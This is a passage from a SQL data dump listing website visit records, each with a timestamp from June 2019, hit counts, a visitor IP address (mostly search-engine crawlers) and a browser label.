.9.94','other'),(430617,1561435577,1,1,0,0,'46.211.102.113','chrome'),(430618,1561435622,1,1,0,0,'54.184.68.1','firefox'),(430619,1561436191,3,3,0,0,'66.249.66.136','chrome'),(430620,1561436262,1,1,0,0,'207.46.13.95','other'),(430621,1561436392,2,2,0,0,'40.77.167.59','other'),(430622,1561437158,1,1,0,0,'66.249.66.136','chrome'),(430623,1561437183,1,1,0,0,'141.8.142.103','other'),(430624,1561437519,1,1,0,0,'207.46.13.95','other'),(430625,1561438341,1,1,0,0,'40.77.167.67','other'),(430626,1561439446,1,1,0,0,'207.46.13.95','other'),(430627,1561439802,1,1,0,0,'66.249.66.138','chrome'),(430628,1561439808,1,1,0,0,'66.249.66.136','chrome'),(430629,1561440092,1,1,0,0,'40.77.167.59','other'),(430630,1561440605,1,1,0,0,'185.220.101.56','other'),(430631,1561441297,1,1,0,0,'172.116.187.144','other'),(430632,1561441598,1,1,0,0,'141.8.142.103','other'),(430633,1561441693,1,1,0,0,'178.154.244.11','other'),(430634,1561441816,2,2,0,0,'8.29.198.26','other'),(430635,1561441890,1,1,0,0,'91.196.178.41','chrome'),(430636,1561442928,1,1,0,0,'95.220.31.179','msie'),(430637,1561443058,1,1,0,0,'77.111.244.8','chrome'),(430638,1561444984,1,1,0,0,'37.9.113.148','other'),(430639,1561445218,2,2,0,0,'40.77.167.170','other'),(430640,1561445255,1,1,0,0,'207.46.13.20','other'),(430641,1561446082,1,1,0,0,'141.8.142.103','other'),(430642,1561446607,1,1,0,0,'66.249.66.134','chrome'),(430643,1561447067,1,1,0,0,'40.77.167.33','other'),(430644,1561447449,1,1,0,0,'91.196.178.166','chrome'),(430645,1561448029,1,1,0,0,'207.46.13.20','other'),(430646,1561448331,1,1,0,0,'40.77.167.170','other'),(430647,1561449061,1,1,0,0,'66.249.66.138','chrome'),(430648,1561449452,1,1,0,0,'66.249.66.64','chrome'),(430649,1561449513,1,1,0,0,'185.126.254.242','chrome'),(430650,1561449548,2,2,0,0,'207.46.13.20','other'),(430651,1561449562,1,1,0,0,'40.77.167.170','other'),(430652,1561449647,2,2,0,0,'23.247.81.42','chrome'),(430653,1561450753,1,1,0,0,'23.247.81.42','chrome'),(430654,1561451169,1,1,0,0,'40.77.167.170','other'),(430655,1561451305,1,1,0,0,'207.46.13.20','other'),(430656,1561451526,1,1,0,0,'207.46.13.229','other'),(430657,1561452033,2,2,0,0,'66.249.66.134','chrome'),(430658,1561452106,2,2,0,0,'66.249.66.136','chrome'),(430659,1561452206,1,1,0,0,'91.124.182.170','firefox'),(430660,1561452330,1,1,0,0,'37.53.224.203','chrome'),(430661,1561452704,2,2,0,0,'8.29.198.26','other'),(430662,1561452709,1,1,0,0,'66.249.66.66','chrome'),(430663,1561452753,5,5,0,0,'176.9.9.94','other'),(430664,1561452774,1,1,0,0,'87.250.224.47','other'),(430665,1561453029,1,1,0,0,'5.45.207.79','other'),(430666,1561453726,1,1,0,0,'91.196.178.82','chrome'),(430667,1561454056,1,1,0,0,'91.196.178.166','chrome'),(430668,1561454579,1,1,0,0,'123.31.43.162','firefox'),(430669,1561455039,1,1,0,0,'157.55.39.195','other'),(430670,1561455098,2,2,0,0,'157.55.39.22','other'),(430671,1561455228,2,2,0,0,'141.8.142.103','other'),(430672,1561455492,1,1,0,0,'66.249.66.138','chrome'),(430673,1561455504,1,1,0,0,'66.249.66.134','chrome'),(430674,1561456049,1,1,0,0,'193.106.30.98','chrome'),(430675,1561456119,1,1,0,0,'5.45.207.79','other'),(430676,1561456147,1,1,0,0,'5.45.207.19','other'),(430677,1561457321,3,3,0,0,'157.55.39.195','other'),(430678,1561457924,1,1,0,0,'109.74.154.72','chrome'),(430679,1561457992,1,1,0,0,'157.55.39.22','other'),(430680,1561458044,2,2,0,0,'207.46.13.177','other'),(430681,1561458589,2,2,0,0,'66.249.66.138','chrome'),(430682,1561458796,1,1,0,0,'13.66.139.0','other'),(430683,1561459286,1,1,0,0,'66.249.66.134','chrome'),(430684,1561459291,1,1,0,0,'66.249.66.136','chrome'),(430685,1561460101,1,1,0,0,'148.72.23.24','firefox'),(430686,1561460160,1,1,0,0,'17.58.99.65','other'),(430687,1561461331,2,2,0,0,'66.249.66.136','chrome'),(430688,1561461537,1,1,0,0,'157.55.39.38','other'),(430689,1561462892,1,1,0,0,'91.196.178.87','firefox'),(430690,1561463611,1,1,0,0,'8.29.198.27','other'),(430691,1561463709,1,1,0,0,'8.29.198.25','other'),(430692,1561464313,1,1,0,0,'192.95.30.180','firefox'),(430693,1561464694,1,1,0,0,'157.55.39.22','other'),(430694,1561465198,1,1,0,0,'66.249.66.134','chrome'),(430695,1561465290,1,1,0,0,'178.154.244.11','other'),(430696,1561465294,1,1,0,0,'66.249.66.138','chrome'),(430697,1561465376,1,1,0,0,'66.249.66.68','chrome'),(430698,1561465384,1,1,0,0,'157.55.39.253','other'),(430699,1561465394,1,1,0,0,'5.45.207.79','other'),(430700,1561466228,1,1,0,0,'91.196.178.87','firefox'),(430701,1561466256,2,2,0,0,'157.55.39.195','other'),(430702,1561467576,2,2,0,0,'207.46.13.161','other'),(430703,1561468878,9,9,0,0,'176.9.9.94','other'),(430704,1561469935,1,1,0,0,'5.45.207.79','other'),(430705,1561469959,1,1,0,0,'5.45.207.19','other'),(430706,1561470088,1,1,0,0,'66.249.66.136','chrome'),(430707,1561470255,1,1,0,0,'66.249.66.134','chrome'),(430708,1561470536,1,1,0,0,'5.1.20.197','chrome'),(430709,1561471388,1,1,0,0,'176.213.157.199','chrome'),(430710,1561471544,1,1,0,0,'178.255.215.94','other'),(430711,1561471644,1,1,0,0,'157.55.39.238','other'),(430712,1561472804,1,1,0,0,'66.249.66.134','chrome'),(430713,1561472925,2,2,0,0,'157.55.39.4','other'),(430714,1561473054,2,2,0,0,'157.55.39.138','other'),(430715,1561473065,1,1,0,0,'157.55.39.50','other'),(430716,1561474375,1,1,0,0,'141.8.142.103','other'),(430717,1561474571,1,1,0,0,'8.29.198.25','other'),(430718,1561474616,1,1,0,0,'8.29.198.26','other'),(430719,1561475009,1,1,0,0,'46.211.110.91','chrome'),(430720,1561475121,1,1,0,0,'157.55.39.4','other'),(430721,1561475155,1,1,0,0,'157.55.39.138','other'),(430722,1561476076,1,1,0,0,'66.249.66.134','chrome'),(430723,1561476435,1,1,0,0,'178.154.244.11','other'),(430724,1561476818,3,3,0,0,'157.55.39.4','other'),(430725,1561477605,2,2,0,0,'66.249.66.134','chrome'),(430726,1561477848,1,1,0,0,'40.77.167.62','other'),(430727,1561478573,1,1,0,0,'178.154.244.11','other'),(430728,1561480812,1,1,0,0,'40.77.167.62','other'),(430729,1561480902,1,1,0,0,'66.249.66.64','chrome'),(430730,1561480955,3,3,0,0,'66.249.66.136','chrome'),(430731,1561481282,1,1,0,0,'91.196.178.33','chrome'),(430732,1561481466,2,2,0,0,'66.249.66.134','chrome'),(430733,1561481762,1,1,0,0,'157.55.39.138','other'),(430734,1561481898,1,1,0,0,'141.8.142.103','other'),(430735,1561482324,1,1,0,0,'157.55.39.238','other'),(430736,1561482543,1,1,0,0,'193.106.30.98','chrome'),(430737,1561483429,1,1,0,0,'157.55.39.4','other'),(430738,1561483833,1,1,0,0,'5.45.207.19','other'),(430739,1561483888,2,2,0,0,'157.55.39.162','other'),(430740,1561483903,3,3,0,0,'157.55.39.238','other'),(430741,1561484203,9,9,0,0,'176.9.9.94','other'),(430742,1561484445,5,5,0,0,'23.247.81.42','chrome'),(430743,1561485105,1,1,0,0,'176.9.9.94','other'),(430744,1561485379,1,1,0,0,'95.108.181.54','other'),(430745,1561485483,1,1,0,0,'8.29.198.25','other'),(430746,1561485501,1,1,0,0,'157.55.39.238','other'),(430747,1561485513,1,1,0,0,'8.29.198.26','other'),(430748,1561485643,1,1,0,0,'66.249.66.134','chrome'),(430749,1561486007,1,1,0,0,'207.46.13.183','other'),(430750,1561486176,1,1,0,0,'91.196.178.88','firefox'),(430751,1561486606,1,1,0,0,'66.249.66.134','chrome'),(430752,1561487021,1,1,0,0,'66.249.66.136','chrome'),(430753,1561487305,1,1,0,0,'5.45.207.79','other'),(430754,1561487516,1,1,0,0,'157.55.39.162','other'),(430755,1561487590,1,1,0,0,'157.55.39.238','other'),(430756,1561487615,1,1,0,0,'213.174.22.114','chrome'),(430757,1561487865,1,1,0,0,'207.46.13.183','other'),(430758,1561488704,1,1,0,0,'40.77.167.62','other'),(430759,1561489631,2,2,0,0,'207.46.13.183','other'),(430760,1561489974,1,1,0,0,'66.249.66.138','chrome'),(430761,1561489978,1,1,0,0,'66.249.66.134','chrome'),(430762,1561490023,1,1,0,0,'66.249.66.136','chrome'),(430763,1561490800,1,1,0,0,'207.46.13.131','other'),(430764,1561491072,1,1,0,0,'157.55.39.162','other'),(430765,1561491699,1,1,0,0,'207.46.13.183','other'),(430766,1561492234,1,1,0,0,'66.249.66.134','chrome'),(430767,1561492405,1,1,0,0,'178.154.244.49','other'),(430768,1561493035,1,1,0,0,'207.46.13.131','other'),(430769,1561493144,1,1,0,0,'128.124.171.52','chrome'),(430770,1561493256,1,1,0,0,'96.44.187.42','chrome'),(430771,1561493625,1,1,0,0,'5.45.207.19','other'),(430772,1561493798,1,1,0,0,'66.249.66.138','chrome'),(430773,1561494800,1,1,0,0,'207.46.13.46','other'),(430774,1561496391,2,2,0,0,'8.29.198.26','other'),(430775,1561496502,1,1,0,0,'185.190.149.1','chrome'),(430776,1561497765,1,1,0,0,'207.46.13.131','other'),(430777,1561498198,1,1,0,0,'66.249.66.136','chrome'),(430778,1561498871,1,1,0,0,'5.45.207.19','other'),(430779,1561499178,1,1,0,0,'66.249.66.138','chrome'),(430780,1561499447,1,1,0,0,'207.46.13.199','other'),(430781,1561500586,2,2,0,0,'51.77.52.160','chrome'),(430782,1561500647,3,3,0,0,'176.9.9.94','other'),(430783,1561501327,1,1,0,0,'178.154.244.65','other'),(430784,1561501434,1,1,0,0,'87.250.224.118','other'),(430785,1561501509,1,1,0,0,'95.108.181.54','other'),(430786,1561503336,1,1,0,0,'66.249.66.136','chrome'),(430787,1561504177,1,1,0,0,'157.55.39.162','other'),(430788,1561504361,1,1,0,0,'157.55.39.80','other'),(430789,1561504845,1,1,0,0,'207.46.13.199','other'),(430790,1561505506,1,1,0,0,'148.251.135.214','other'),(430791,1561506383,1,1,0,0,'66.249.66.136','chrome'),(430792,1561506394,2,2,0,0,'66.249.66.134','chrome'),(430793,1561506608,2,2,0,0,'157.55.39.80','other'),(430794,1561506967,1,1,0,0,'207.46.13.199','other'),(430795,1561507277,1,1,0,0,'95.108.181.54','other'),(430796,1561507284,2,2,0,0,'8.29.198.27','other'),(430797,1561507569,1,1,0,0,'178.154.200.48','other'),(430798,1561507604,2,2,0,0,'157.55.39.162','other'),(430799,1561508164,1,1,0,0,'66.249.66.64','chrome'),(430800,1561508174,2,2,0,0,'66.249.66.136','chrome'),(430801,1561508218,2,2,0,0,'157.55.39.80','other'),(430802,1561508221,1,1,0,0,'66.249.66.138','chrome'),(430803,1561511274,1,1,0,0,'157.55.39.80','other'),(430804,1561511970,1,1,0,0,'66.249.66.134','chrome'),(430805,1561512290,1,1,0,0,'78.46.149.254','other'),(430806,1561513669,1,1,0,0,'66.249.66.134','chrome'),(430807,1561513957,1,1,0,0,'157.55.39.80','other'),(430808,1561514196,1,1,0,0,'87.250.224.81','other'),(430809,1561514279,2,2,0,0,'176.9.9.94','other'),(430810,1561515021,28,28,0,0,'144.76.115.163','other'),(430811,1561515171,1,1,0,0,'207.46.13.93','other'),(430812,1561515392,1,1,0,0,'66.249.66.136','chrome'),(430813,1561515609,1,1,0,0,'23.247.81.42','chrome'),(430814,1561515831,1,1,0,0,'37.9.113.148','other'),(430815,1561516264,1,1,0,0,'110.78.175.31','msie'),(430816,1561516318,1,1,0,0,'66.249.66.134','chrome'),(430817,1561517079,1,1,0,0,'157.55.39.123','other'),(430818,1561518204,1,1,0,0,'8.29.198.26','other'),(430820,1561518207,1,1,0,0,'8.29.198.27','other'),(430821,1561519170,1,1,0,0,'66.249.66.134','chrome'),(430822,1561519281,1,1,0,0,'207.46.13.233','other'),(430823,1561519847,1,1,0,0,'213.14.107.67','other'),(430824,1561519891,2,2,0,0,'87.250.224.47','other'),(430825,1561519922,1,1,0,0,'37.9.113.103','other'),(430826,1561519931,1,1,0,0,'95.108.181.75','other'),(430827,1561520052,1,1,0,0,'95.108.181.83','other'),(430828,1561521086,1,1,0,0,'66.249.66.136','chrome'),(430829,1561521093,1,1,0,0,'66.249.66.134','chrome'),(430830,1561521717,1,1,0,0,'213.180.203.17','other'),(430831,1561522548,1,1,0,0,'40.77.167.168','other'),(430832,1561523156,1,1,0,0,'93.158.166.7','other'),(430833,1561523326,1,1,0,0,'141.8.142.191','other'),(430834,1561523328,1,1,0,0,'178.154.244.65','other'),(430835,1561523962,1,1,0,0,'13.66.139.0','other'),(430836,1561524268,1,1,0,0,'40.77.167.168','other'),(430837,1561524852,1,1,0,0,'207.46.13.93','other'),(430838,1561524928,2,2,0,0,'66.249.66.136','chrome'),(430839,1561524966,1,1,0,0,'66.249.66.138','chrome'),(430840,1561525176,1,1,0,0,'40.77.167.25','other'),(430841,1561525330,1,1,0,0,'176.9.9.94','other'),(430842,1561525468,1,1,0,0,'66.249.66.68','chrome'),(430843,1561525912,2,2,0,0,'66.249.66.134','chrome'),(430844,1561525921,1,1,0,0,'66.249.66.64','chrome'),(430845,1561526065,2,2,0,0,'66.249.66.136','chrome'),(430846,1561526409,1,1,0,0,'141.8.142.103','other'),(430847,1561527484,3,3,0,0,'66.249.66.136','chrome'),(430848,1561527556,2,2,0,0,'66.249.66.134','chrome'),(430849,1561527706,1,1,0,0,'178.174.57.58','chrome'),(430850,1561527743,1,1,0,0,'109.70.100.23','other'),(430851,1561527972,1,1,0,0,'66.249.66.138','chrome'),(430852,1561528049,1,1,0,0,'207.46.13.181','other'),(430853,1561528499,2,2,0,0,'66.249.66.136','chrome'),(430854,1561528784,5,5,0,0,'66.249.66.134','chrome'),(430855,1561528934,1,1,0,0,'157.55.39.46','other'),(430856,1561528989,1,1,0,0,'66.249.66.68','chrome'),(430857,1561528991,2,2,0,0,'66.249.66.66','chrome'),(430858,1561529098,1,1,0,0,'8.29.198.27','other'),(430859,1561529110,1,1,0,0,'8.29.198.25','other'),(430860,1561529180,1,1,0,0,'66.249.66.138','chrome'),(430861,1561529412,1,1,0,0,'66.249.66.64','chrome'),(430862,1561530035,1,1,0,0,'213.180.203.61','other'),(430863,1561530197,1,1,0,0,'178.154.200.48','other'),(430864,1561530268,1,1,0,0,'66.249.66.138','chrome'),(430865,1561530420,1,1,0,0,'66.249.66.68','chrome'),(430866,1561530426,1,1,0,0,'13.66.139.0','other'),(430867,1561530513,1,1,0,0,'141.8.142.191','other'),(430868,1561530530,2,2,0,0,'66.249.66.136','chrome'),(430869,1561530555,3,3,0,0,'66.249.66.134','chrome'),(430870,1561531342,1,1,0,0,'157.55.39.203','other'),(430871,1561531488,4,4,0,0,'66.249.66.136','chrome'),(430872,1561531527,1,1,0,0,'66.249.66.134','chrome'),(430873,1561532046,1,1,0,0,'66.249.66.138','chrome'),(430874,1561532048,1,1,0,0,'66.249.66.66','chrome'),(430875,1561532417,1,1,0,0,'40.77.167.92','other'),(430876,1561532559,1,1,0,0,'66.249.66.136','chrome'),(430877,1561533398,1,1,0,0,'66.249.66.134','chrome'),(430878,1561533421,1,1,0,0,'213.180.203.17','other'),(430879,1561533531,1,1,0,0,'91.196.178.172','chrome'),(430880,1561533889,1,1,0,0,'40.77.167.92','other'),(430881,1561533895,2,2,0,0,'157.55.39.46','other'),(430882,1561533943,1,1,0,0,'95.108.213.4','other'),(430883,1561533954,1,1,0,0,'141.8.142.103','other'),(430884,1561534205,1,1,0,0,'178.154.171.30','other'),(430885,1561534478,3,3,0,0,'66.249.66.134','chrome'),(430886,1561534557,1,1,0,0,'66.249.66.136','chrome'),(430887,1561534643,2,2,0,0,'66.249.66.138','chrome'),(430888,1561534676,1,1,0,0,'66.249.66.68','chrome'),(430889,1561535204,1,1,0,0,'40.77.167.168','other'),(430890,1561535758,1,1,0,0,'91.196.178.93','firefox'),(430891,1561535964,3,3,0,0,'66.249.66.134','chrome'),(430892,1561536010,1,1,0,0,'66.249.66.136','chrome'),(430893,1561536170,1,1,0,0,'66.249.66.66','chrome'),(430894,1561536205,4,4,0,0,'66.249.66.138','chrome'),(430895,1561536308,1,1,0,0,'40.77.167.92','other'),(430896,1561536965,1,1,0,0,'66.249.66.134','chrome'),(430897,1561537385,1,1,0,0,'37.9.113.148','other'),(430898,1561537386,2,2,0,0,'91.196.178.93','firefox'),(430899,1561537441,1,1,0,0,'193.106.30.98','chrome'),(430900,1561537965,1,1,0,0,'66.249.66.134','chrome'),(430901,1561538354,2,2,0,0,'66.249.66.138','chrome'),(430902,1561538521,1,1,0,0,'66.249.66.136','chrome'),(430903,1561539053,1,1,0,0,'157.55.39.203','other'),(430904,1561539330,1,1,0,0,'176.9.51.93','other'),(430905,1561539387,1,1,0,0,'5.255.253.25','other'),(430906,1561539631,1,1,0,0,'66.249.66.134','chrome'),(430907,1561539662,1,1,0,0,'95.27.174.36','msie'),(430908,1561539691,1,1,0,0,'93.158.166.7','other'),(430909,1561539749,1,1,0,0,'37.9.113.148','other'),(430910,1561540003,2,2,0,0,'8.29.198.26','other'),(430911,1561540541,1,1,0,0,'157.55.39.203','other'),(430912,1561540635,1,1,0,0,'157.55.39.4','other'),(430913,1561540781,2,2,0,0,'66.249.66.134','chrome'),(430914,1561540806,3,3,0,0,'66.249.66.138','chrome'),(430915,1561540987,2,2,0,0,'66.249.66.136','chrome'),(430916,1561541063,1,1,0,0,'66.249.66.64','chrome'),(430917,1561541515,1,1,0,0,'95.108.181.54','other'),(430918,1561541818,1,1,0,0,'46.166.186.206','other'),(430919,1561541819,1,1,0,0,'5.255.253.25','other'),(430920,1561541834,1,1,0,0,'141.8.142.144','other'),(430921,1561541896,1,1,0,0,'66.249.66.136','chrome'),(430922,1561542034,1,1,0,0,'95.108.181.83','other'),(430923,1561542189,1,1,0,0,'66.249.66.138','chrome'),(430924,1561542816,1,1,0,0,'62.210.83.78','firefox'),(430925,1561543784,1,1,0,0,'66.249.66.134','chrome'),(430926,1561544210,2,2,0,0,'66.249.66.136','chrome'),(430927,1561544217,1,1,0,0,'94.178.3.141','chrome'),(430928,1561544271,1,1,0,0,'157.55.39.46','other'),(430929,1561544502,1,1,0,0,'157.55.39.203','other'),(430930,1561544875,2,2,0,0,'66.249.66.138','chrome'),(430931,1561545049,1,1,0,0,'109.74.154.72','chrome'),(430932,1561545051,1,1,0,0,'5.45.207.19','other'),(430933,1561545269,1,1,0,0,'66.249.66.136','chrome'),(430934,1561545353,1,1,0,0,'178.154.244.11','other'),(430935,1561545418,5,5,0,0,'66.249.66.134','chrome'),(430936,1561545518,2,2,0,0,'95.213.141.126','opera'),(430937,1561546693,1,1,0,0,'91.196.178.174','chrome'),(430938,1561547369,2,2,0,0,'34.67.91.114','chrome'),(430940,1561547422,3,3,0,0,'35.188.183.158','chrome'),(430941,1561547436,1,1,0,0,'35.192.219.253','chrome'),(430942,1561547437,2,2,0,0,'35.192.219.253','chrome'),(430943,1561547452,3,3,0,0,'35.222.41.151','chrome'),(430944,1561547468,3,3,0,0,'35.222.191.55','chrome'),(430945,1561547666,6,6,0,0,'66.249.66.136','chrome'),(430946,1561547674,6,6,0,0,'66.249.66.134','chrome'),(430947,1561547981,2,1,1,0,'66.249.66.66',''),(430948,1561548241,1,1,0,0,'66.249.66.68','chrome'),(430949,1561548354,1,1,0,0,'66.249.66.64','chrome'),(430950,1561548419,1,0,1,0,'66.249.66.138',''),(430951,1561548620,2,2,0,0,'178.154.244.11','other'),(430952,1561548851,1,1,0,0,'91.196.178.79','chrome'),(430953,1561549201,1,1,0,0,'66.249.66.138','chrome'),(430954,1561549531,1,1,0,0,'66.249.66.68','chrome'),(430955,1561550180,1,1,0,0,'176.98.69.218','chrome'),(430956,1561550501,1,1,0,0,'157.55.39.93','other'),(430957,1561550590,4,4,0,0,'66.249.66.136','chrome'),(430958,1561550606,3,3,0,0,'66.249.66.134','chrome'),(430959,1561550761,1,1,0,0,'66.249.66.64','chrome'),(430960,1561550899,1,1,0,0,'8.29.198.26','other'),(430961,1561550914,1,1,0,0,'8.29.198.27','other'),(430962,1561551001,1,1,0,0,'66.249.66.66','chrome'),(430963,1561551068,1,1,0,0,'176.9.9.94','other'),(430964,1561551774,1,1,0,0,'141.8.142.144','other'),(430965,1561552033,1,1,0,0,'37.54.22.4','chrome'),(430966,1561552082,1,1,0,0,'66.249.66.66','chrome'),(430967,1561552280,1,1,0,0,'93.158.166.7','other'),(430968,1561552309,1,1,0,0,'91.196.178.79','chrome'),(430969,1561552341,1,1,0,0,'178.154.171.27','other'),(430970,1561552413,1,1,0,0,'212.1.71.6','chrome'),(430971,1561552453,1,1,0,0,'157.55.39.22','other'),(430972,1561552482,3,3,0,0,'66.249.66.134','chrome'),(430973,1561552526,3,3,0,0,'66.249.66.138','chrome'),(430974,1561552623,2,2,0,0,'66.249.66.64','chrome'),(430975,1561553215,1,1,0,0,'141.8.142.144','other'),(430976,1561554250,2,2,0,0,'66.249.66.136','chrome'),(430977,1561554404,1,1,0,0,'96.44.187.42','chrome'),(430978,1561554494,2,2,0,0,'66.249.66.138','chrome'),(430979,1561555076,1,1,0,0,'40.77.167.181','other'),(430980,1561555133,1,1,0,0,'157.55.39.93','other'),(430981,1561555147,1,1,0,0,'66.249.66.64','chrome'),(430982,1561555178,2,2,0,0,'66.249.66.136','chrome'),(430983,1561555181,3,3,0,0,'66.249.66.134','chrome'),(430984,1561555561,2,2,0,0,'157.55.39.22','other'),(430985,1561556460,1,1,0,0,'5.45.207.79','other'),(430986,1561556464,1,1,0,0,'178.154.244.11','other'),(430987,1561556479,2,2,0,0,'66.249.66.134','chrome'),(430988,1561557276,1,1,0,0,'157.55.39.93','other'),(430989,1561557394,3,3,0,0,'66.249.66.136','chrome'),(430990,1561557602,1,1,0,0,'66.249.66.64','chrome'),(430991,1561557717,1,1,0,0,'157.55.39.22','other'),(430992,1561559044,1,1,0,0,'66.249.66.138','chrome'),(430993,1561559193,2,2,0,0,'178.154.244.11','other'),(430994,1561559554,1,1,0,0,'207.46.13.109','other'),(430995,1561559560,1,1,0,0,'66.249.66.64','chrome'),(430996,1561560239,1,1,0,0,'66.249.66.66','chrome'),(430997,1561560380,2,2,0,0,'66.249.66.136','chrome'),(430998,1561560414,1,1,0,0,'66.249.66.68','chrome'),(430999,1561560466,1,1,0,0,'13.66.139.0','other'),(431000,1561560471,1,1,0,0,'157.55.39.93','other'),(431001,1561560482,2,2,0,0,'66.249.66.134','chrome'),(431002,1561560580,2,2,0,0,'66.249.66.138','chrome'),(431003,1561560864,1,1,0,0,'95.108.181.75','other'),(431004,1561560928,1,1,0,0,'95.108.213.4','other'),(431005,1561561304,1,1,0,0,'5.45.207.8','other'),(431006,1561561325,1,1,0,0,'40.77.167.108','other'),(431007,1561561649,2,2,0,0,'66.249.66.138','chrome'),(431008,1561561848,1,1,0,0,'8.29.198.27','other'),(431009,1561561884,1,1,0,0,'8.29.198.25','other'),(431010,1561561899,3,3,0,0,'66.249.66.136','chrome'),(431011,1561562333,1,1,0,0,'66.249.66.66','chrome'),(431012,1561562365,3,3,0,0,'66.249.66.134','chrome'),(431013,1561562401,1,1,0,0,'66.249.66.68','chrome'),(431014,1561562659,2,2,0,0,'176.9.9.94','other'),(431015,1561562927,2,2,0,0,'207.46.13.109','other'),(431016,1561563554,1,1,0,0,'219.140.155.201','other'),(431017,1561563575,1,1,0,0,'66.249.66.64','chrome'),(431018,1561564314,1,1,0,0,'66.249.66.83','chrome'),(431019,1561564406,1,1,0,0,'66.249.66.68','chrome'),(431020,1561564533,5,5,0,0,'66.249.66.136','chrome'),(431021,1561564765,1,1,0,0,'66.249.66.134','chrome'),(431022,1561564786,2,2,0,0,'157.55.39.212','other'),(431023,1561565307,1,1,0,0,'40.77.167.108','other'),(431024,1561566285,1,1,0,0,'66.249.66.136','chrome'),(431025,1561566336,1,1,0,0,'66.249.66.66','chrome'),(431026,1561566350,2,2,0,0,'66.249.66.134','chrome'),(431027,1561566354,1,1,0,0,'94.231.219.113','opera'),(431028,1561566494,1,1,0,0,'95.108.181.75','other'),(431029,1561566957,2,2,0,0,'66.249.66.64','chrome'),(431030,1561567220,4,4,0,0,'66.249.66.136','chrome'),(431031,1561567367,2,2,0,0,'40.77.167.108','other'),(431032,1561567422,3,3,0,0,'66.249.66.134','chrome'),(431033,1561567441,2,2,0,0,'66.249.66.138','chrome'),(431034,1561567592,1,1,0,0,'40.77.167.181','other'),(431035,1561568492,1,1,0,0,'66.249.66.64','chrome'),(431036,1561568595,1,1,0,0,'40.77.167.181','other'),(431037,1561568734,5,5,0,0,'66.249.66.136','chrome'),(431038,1561568764,4,4,0,0,'66.249.66.134','chrome'),(431039,1561568861,1,1,0,0,'66.249.66.68','chrome'),(431040,1561569182,1,1,0,0,'157.55.39.113','other'),(431041,1561569676,1,1,0,0,'87.250.224.81','other'),(431042,1561569831,1,1,0,0,'66.249.66.136','chrome'),(431043,1561570482,1,1,0,0,'157.55.39.238','other'),(431044,1561570492,3,3,0,0,'66.249.66.138','chrome'),(431045,1561570644,2,2,0,0,'66.249.66.134','chrome'),(431046,1561570916,1,1,0,0,'66.249.66.68','chrome'),(431047,1561571038,1,1,0,0,'66.249.66.136','chrome'),(431048,1561571840,3,3,0,0,'66.249.66.138','chrome'),(431049,1561571844,1,1,0,0,'66.249.66.68','chrome'),(431050,1561571947,2,2,0,0,'66.249.66.64','chrome'),(431051,1561572161,2,2,0,0,'66.249.66.134','chrome'),(431052,1561572371,2,2,0,0,'66.249.66.136','chrome'),(431053,1561572763,1,1,0,0,'157.55.39.238','other'),(431054,1561572766,1,1,0,0,'8.29.198.25','other'),(431055,1561572768,2,2,0,0,'40.77.167.179','other'),(431056,1561572806,1,1,0,0,'8.29.198.27','other'),(431057,1561573208,1,1,0,0,'66.249.66.66','chrome'),(431058,1561573209,2,2,0,0,'66.249.66.134','chrome'),(431059,1561573235,1,1,0,0,'37.9.113.103','other'),(431060,1561573336,1,1,0,0,'207.46.13.32','other'),(431061,1561573472,1,1,0,0,'176.9.9.94','other'),(431062,1561574263,3,3,0,0,'66.249.66.136','chrome'),(431063,1561574305,2,2,0,0,'66.249.66.138','chrome'),(431064,1561574955,1,1,0,0,'157.55.39.238','other'),(431065,1561575107,1,1,0,0,'66.249.66.134','chrome'),(431066,1561576436,1,1,0,0,'66.249.66.134','chrome'),(431067,1561576515,1,1,0,0,'207.46.13.32','other'),(431068,1561576532,1,1,0,0,'157.55.39.238','other'),(431069,1561578020,1,1,0,0,'66.249.66.64','chrome'),(431070,1561578914,1,1,0,0,'5.45.207.79','other'),(431071,1561579042,1,1,0,0,'66.249.66.138','chrome'),(431072,1561579535,1,1,0,0,'66.249.66.68','chrome'),(431073,1561579536,1,1,0,0,'66.249.66.66','chrome'),(431074,1561579545,1,1,0,0,'5.45.207.19','other'),(431075,1561580418,2,2,0,0,'40.77.167.179','other'),(431076,1561580781,3,3,0,0,'66.249.66.136','chrome'),(431077,1561580817,5,5,0,0,'66.249.66.134','chrome'),(431078,1561580830,3,3,0,0,'66.249.66.138','chrome'),(431079,1561581278,1,1,0,0,'66.249.66.64','chrome'),(431080,1561582639,1,1,0,0,'66.249.66.64','chrome'),(431081,1561582904,1,1,0,0,'66.249.66.68','chrome'),(431082,1561582910,2,2,0,0,'66.249.66.136','chrome'),(431083,1561583012,1,1,0,0,'66.249.66.66','chrome'),(431084,1561583031,1,1,0,0,'66.249.66.134','chrome'),(431085,1561583186,1,1,0,0,'157.55.39.225','other'),(431086,1561583685,1,1,0,0,'8.29.198.27','other'),(431087,1561583711,1,1,0,0,'8.29.198.26','other'),(431088,1561584159,3,3,0,0,'66.249.66.136','chrome'),(431089,1561584284,2,2,0,0,'66.249.66.134','chrome'),(431090,1561584435,2,2,0,0,'157.55.39.225','other'),(431091,1561584461,2,2,0,0,'66.249.66.138','chrome'),(431092,1561584571,1,1,0,0,'66.249.66.68','chrome'),(431093,1561585150,1,1,0,0,'141.8.142.103','other'),(431094,1561586025,2,2,0,0,'66.249.66.64','chrome'),(431095,1561586066,2,2,0,0,'66.249.66.138','chrome'),(431096,1561586720,1,1,0,0,'66.249.66.66','chrome'),(431097,1561586762,3,3,0,0,'66.249.66.134','chrome'),(431098,1561586793,1,1,0,0,'176.9.9.94','other'),(431099,1561587011,1,1,0,0,'66.249.66.138','chrome'),(431100,1561587047,1,1,0,0,'40.77.167.179','other'),(431101,1561588291,3,3,0,0,'66.249.66.136','chrome'),(431102,1561588406,3,3,0,0,'66.249.66.138','chrome'),(431103,1561588480,2,2,0,0,'66.249.66.134','chrome'),(431104,1561588600,1,1,0,0,'66.249.66.66','chrome'),(431105,1561588713,1,1,0,0,'37.9.113.20','other'),(431106,1561590553,2,2,0,0,'66.249.66.66','chrome'),(431107,1561590575,1,1,0,0,'66.249.66.64','chrome'),(431108,1561591245,2,2,0,0,'66.249.66.68','chrome'),(431109,1561591480,1,1,0,0,'66.249.66.134','chrome'),(431110,1561591484,1,1,0,0,'40.77.167.179','other'),(431111,1561591780,2,2,0,0,'5.45.207.19','other'),(431112,1561591866,1,1,0,0,'5.45.207.79','other'),(431113,1561592153,1,1,0,0,'66.249.66.66','chrome'),(431114,1561592281,1,1,0,0,'207.46.13.93','other'),(431115,1561592477,1,1,0,0,'66.249.66.64','chrome'),(431116,1561592506,4,4,0,0,'66.249.66.134','chrome'),(431117,1561592955,1,1,0,0,'66.249.66.68','chrome'),(431118,1561593226,1,1,0